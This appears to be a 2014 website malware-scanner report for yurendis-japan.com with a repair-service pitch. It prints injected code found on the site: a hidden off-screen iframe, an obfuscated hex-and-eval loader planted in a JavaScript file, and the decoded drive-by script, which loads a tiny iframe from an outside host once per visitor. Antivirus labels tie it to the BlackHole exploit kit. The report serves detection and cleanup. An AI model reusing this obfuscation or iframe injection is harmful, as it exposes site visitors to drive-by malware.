New scan:

Malware Scanner report for yurendis-japan.com

Malicious/Suspicious/Total urls checked
1/1/3
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "yurendis-japan.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=yurendis-japan.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://yurendis-japan.com/
200 OK
Content-Length: 2732
Content-Type: text/html
suspicious
Suspicious code found

<style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id="nair" name="nair" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://www.sweetvine.org/7NWpK63z.php" > </iframe>

http://yurendis-japan.com/AC_RunActiveContent.js
200 OK
Content-Length: 11513
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e888782872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b18
... 2173 bytes are skipped ...
38283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Decoded script:


String
String
function zzzfff() {
var zyty = document.createElement('iframe');

zyty.src = 'http://www.woodshedembroidery.com/admin/HfXv7DZy.php';
zyty.style.position = 'absolute';
zyty.style.border = '0';
zyty.style.height = '1px';
zyty.style.width = '1px';
zyty.style.left = '1px';
zyty.style.top = '1px';

if (!document.getElementById('zyty')) {
document.write('<div id=\'zyty\'></div>');
docume
... 2119 bytes are skipped ...
!start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
}
}

Antivirus reports:

AntiVir
JS/iFrame.kpp
Avast
JS:Iframe-CSU [Trj]
Ad-Aware
JS:Exploit.BlackHole.PI
Ikarus
Virus.HTML.Framer
Rising
JS:Script.JS.Quidvetis.a!1612922
nProtect
JS:Exploit.BlackHole.PI
K7AntiVirus
Riskware ( 885143830 )
TrendMicro-HouseCall
TROJ_GEN.F47V1123
Emsisoft
JS:Exploit.BlackHole.PI (B)
Comodo
UnclassifiedMalware
McAfee-GW-Edition
JS/Iframe.gen.u
DrWeb
JS.IFrame.500
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Quidvetis.A
MicroWorld-eScan
JS:Exploit.BlackHole.PI
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Iframe.gen.u
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
JS:Exploit.BlackHole.PI
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Blacole.XE
Commtouch
JS/IFrame.RS.gen
BitDefender
JS:Exploit.BlackHole.PI

http://yurendis-japan.com/test404page.js
404 Not Found
Content-Length: 910
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: yurendis-japan.com

Result:
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2014 07:07:11 GMT
Accept-Ranges: bytes
ETag: "99e27a3ec0d0ce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 2732
Content-Type: text/html
Last-Modified: Thu, 24 Oct 2013 13:52:14 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

...2732 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yurendis-japan.com
Referer: http://www.google.com/search?q=yurendis-japan.com

Result:
The result is similar to the first query. There are no suspicious redirects found.